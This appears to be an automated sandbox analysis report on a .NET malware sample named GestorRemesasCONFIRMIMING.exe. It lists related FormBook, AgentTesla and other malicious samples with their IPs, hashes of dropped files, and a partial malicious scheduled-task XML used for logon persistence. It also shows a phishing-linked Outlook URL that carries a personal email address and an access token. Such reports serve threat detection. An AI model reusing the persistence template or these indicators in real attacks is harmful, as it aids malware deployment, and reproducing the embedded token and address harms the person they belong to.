                                                CLOUDFLARENETUSinquiry EBS# 82785.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.81.34
                                                DRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
                                                • 172.67.137.210
                                                Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                • 172.67.190.203
                                                NUEVA ORDEN DE COMPRAsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.96.3
                                                PAYMENT ADVICE.exeGet hashmaliciousFormBookBrowse
                                                • 172.67.190.203
                                                proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 172.67.74.152
                                                INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                ZAMOWIEN.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                • 172.67.190.76
                                                https://attachments.office.net/owa/cmangava%40tharisa.com/service.svc/s/GetAttachmentThumbnail?id=AAMkAGE2N2U5NmFkLWIzMjEtNGMwNS1iOWVlLWExNTBkNDk2NTZjMABGAAAAAAAsNFCwuPDISrln6MRbSR5lBwBC4JDOFd8jTJozG%2BNc7YRrAAAAmcUBAABu3YNoqzF8SLI68HoWeAXzAAFRD3sAAAABEgAQAOXLRvcdfU5Kkg7Zx598XsI%3D&thumbnailType=2&token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkU1RDJGMEY4REE5M0I2NzA5QzQzQTlFOEE2MTQzQzAzRDYyRjlBODAiLCJ0eXAiOiJKV1QiLCJ4NXQiOiI1ZEx3LU5xVHRuQ2NRNm5vcGhROEE5WXZtb0EifQ.eyJvcmlnaW4iOiJodHRwczovL291dGxvb2sub2ZmaWNlLmNvbSIsInVjIjoiNTIyZjRhMmM0ZWRmNDA4NjkxMWIwMGFjYzE2ZjgzNzEiLCJzaWduaW5fc3RhdGUiOlsiZHZjX21uZ2QiLCJkdmNfY21wIiwiZHZjX2RtamQiLCJpbmtub3dubnR3ayJdLCJ2ZXIiOiJFeGNoYW5nZS5DYWxsYmFjay5WMSIsImFwcGN0eHNlbmRlciI6Ik93YURvd25sb2FkQDliMDgyOWI5LWJlMzktNDMzNi1hNzY2LWY4YzlkYzJjNzFhNCIsImlzc3JpbmciOiJXVyIsImFwcGN0eCI6IntcIm1zZXhjaHByb3RcIjpcIm93YVwiLFwicHVpZFwiOlwiMTE1MzkwNjY2MTMxNDQwNDI4NFwiLFwic2NvcGVcIjpcIk93YURvd25sb2FkXCIsXCJvaWRcIjpcIjUyMjAyODA5LWJkODUtNGZmOC04NTUwLTRjNzUwZjNhODNlZFwiLFwicHJpbWFyeXNpZFwiOlwiUy0xLTUtMjEtMTAxMjEyODM0Ni0xNjc3NDQzNDQtMTE3Njg1Mjg2MS0xMzc4MTQ4OVwifSIsIm5iZiI6MTcxNjc5NjM3MCwiZXhwIjoxNzE2Nzk2NjcwLCJpc3MiOiIwMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDBAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiYXVkIjoiMDAwMDAwMDItMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwL2F0dGFjaG1lbnRzLm9mZmljZS5uZXRAOWIwODI5YjktYmUzOS00MzM2LWE3NjYtZjhjOWRjMmM3MWE0IiwiaGFwcCI6Im93YSJ9.QgmzIBWvZG6gLwDV2SGPl9TdStXctQrpU_xiIGcL5I4eoVDkUPzqcKcrSAnwOD_E73nNMbCTWC-kgcJIIFGhLmh8iFWITRD5MwmaJN23JV7c8rlmzHlxnoqm8tPo98Soui3XZZYSaJZVTruXDBhUCiweHA69qYSoZDJxVUYZDvl5KvXMWJkA_ui0Vq1Sw7pPL5h9t4_QlGAarVBz6O9q21EGSBoX_hWPpcaEGJwoBDVeI-G6VvbkXzy9bJEMEZ6N-WzLyQtuKS9HVJBafIkUxsf0pIhhnJUluyukhnQ1dZohnpQr8e5v0Xoa3SObMFt_C5SeZHG2hFyxqFdeBhKQ_w&X-OWA-CANARY=X-OWA-CANARY_cookie_is_null_or_empty&owa=outlook.office.com&scriptVer=20240517003.15&clientId=1A63CAED249649AEBB5264A13128C2B5&animation=true&persistenceId=80cb7b14-7011-42b1-acde-250d928510f9Get hashmaliciousHTMLPhisherBrowse
                                                • 104.17.2.184

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eDRAWING_SHEET_P02405912916 .exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                NUEVA ORDEN DE COMPRAsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 172.67.74.152
                                                proforma invoice.bit.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 172.67.74.152
                                                INV 0983 OSY 240524_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                PO_27052024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                01vwXiyQ8K.exeGet hashmaliciousQuasarBrowse
                                                • 172.67.74.152
                                                xA4LQYIndy.exeGet hashmaliciousDCRatBrowse
                                                • 172.67.74.152
                                                https://kruekanlogin.gitbook.io/Get hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                https://fbreview-requestnow.github.io/ajazGet hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                https://mega.nz/file/wncXiYhZ#ABJEpmoiGH0hIeVVKQy7V_ALtGclDnJ4rFrDjwZ8kDEGet hashmaliciousDCRatBrowse
                                                • 172.67.74.152

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GestorRemesasCONFIRMIMING.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XNYbGrcoFr.exe.log

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1216
                                                Entropy (8bit):5.34331486778365
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):2232
                                                Entropy (8bit):5.379460230152629
                                                Encrypted:false
                                                SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyds:fLHyIFKL3IZ2KRH9OugEs
                                                MD5:34A24F781FF96B10A229B570B76ADB2F
                                                SHA1:05B685491D1EF3C94899823A08EF75211AB90338
                                                SHA-256:A8467594B8A3731CDB4833955ED406BE0513088990DE27AD176B552155E5306C
                                                SHA-512:C0F222E2826D34B8B62F4AA9D08034C411B15E20E981F3DF8FD7E04CC8CE1D9B9F02213D1E22A40749F53DCE5511B9371A8202AFE4E1CEDE8113EE6C84951B50
                                                Malicious:false
                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vyaklqy.ki0.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h53jaw2f.hxe.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jop3u3bv.oez.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jz1e4ree.lva.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfcgyhhu.3dc.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngi45rvk.y1t.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogdpofzj.txq.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwnnny1s.qpf.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1597
                                                Entropy (8bit):5.100230155050965
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLu5xvn:cge7QYrFdOFzOzN33ODOiDdKrsuT6vv
                                                MD5:65D16DDB43A933FE9E4A07A22D171FB1
                                                SHA1:1D4808C4CB0D8E6053F1826D0FAA97A455548D5F
                                                SHA-256:333336D921662435A1D7E63B0E3FD1637B6EF75435E1C5588FE6E0CCB7F74F6E
                                                SHA-512:9411FDBF5EAD27D58EB71AA761D579AC16FA8E8DF04AB1E7819C482B7B04F461CE4E783336B1DDF6559BE9EC0B8A7770C291D45F39912D12CEBBAE76E4F6DF60
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1597
                                                Entropy (8bit):5.100230155050965
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLu5xvn:cge7QYrFdOFzOzN33ODOiDdKrsuT6vv
                                                MD5:65D16DDB43A933FE9E4A07A22D171FB1
                                                SHA1:1D4808C4CB0D8E6053F1826D0FAA97A455548D5F
                                                SHA-256:333336D921662435A1D7E63B0E3FD1637B6EF75435E1C5588FE6E0CCB7F74F6E
                                                SHA-512:9411FDBF5EAD27D58EB71AA761D579AC16FA8E8DF04AB1E7819C482B7B04F461CE4E783336B1DDF6559BE9EC0B8A7770C291D45F39912D12CEBBAE76E4F6DF60
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):708096
                                                Entropy (8bit):7.952505061798699
                                                Encrypted:false
                                                SSDEEP:12288:VSKx504bFYOl2Ez2uwJhCuiZlYvXiCf6sUO7FgoPOXyi:QKw4bfMEzeJhElYfVCgel
                                                MD5:B7DB10EC32FE6F53EE4A76E261761C27
                                                SHA1:283EB987F7ED2BFB1B4FBE413DD58B5CA8F31AFD
                                                SHA-256:A0970A01C8310F5643451D71A863709B17E59814B12E81908F37CB649E3D70DE
                                                SHA-512:DAC0AD887CFB6F0379B1238D23AA42F4462CE093459B4BE60478365C8DE48EBF2963CA82F9B3CD83C0B7FC5FD1D8FF370A9F9B77017108EA49BF28C046193094
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 63%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5f................0.................. ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......,`...a............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(.....*".(.....*.r...p.....*..(.......~....s....}......{....o....}....*....0...............{....r...po......{....o ...o!.....{....o ...r...p.o"...&.{....o ...r...p.o"...&.{....o#.....{....o$....+\.sF.......o%...o;.......o&...o=.......o&...o?.......o&...oA.......o&...oC.......o'...oE......o(.....-.....&.......{....o).......*.............

                                                C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.952505061798699
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:GestorRemesasCONFIRMIMING.exe
                                                File size:708'096 bytes
                                                MD5:b7db10ec32fe6f53ee4a76e261761c27
                                                SHA1:283eb987f7ed2bfb1b4fbe413dd58b5ca8f31afd
                                                SHA256:a0970a01c8310f5643451d71a863709b17e59814b12e81908f37cb649e3d70de
                                                SHA512:dac0ad887cfb6f0379b1238d23aa42f4462ce093459b4be60478365c8de48ebf2963ca82f9b3cd83c0b7fc5fd1d8ff370a9f9b77017108ea49bf28c046193094
                                                SSDEEP:12288:VSKx504bFYOl2Ez2uwJhCuiZlYvXiCf6sUO7FgoPOXyi:QKw4bfMEzeJhElYfVCgel
                                                TLSH:FEE42340B7B99B22D87983B8459A04F547B3E49E5429EB4C6E4171DE5CB2B400B60FFB
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5f................0.................. ........@.. .......................@............@................................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x4ae1fe
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xD3B46635 [Mon Jul 20 23:20:21 2082 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
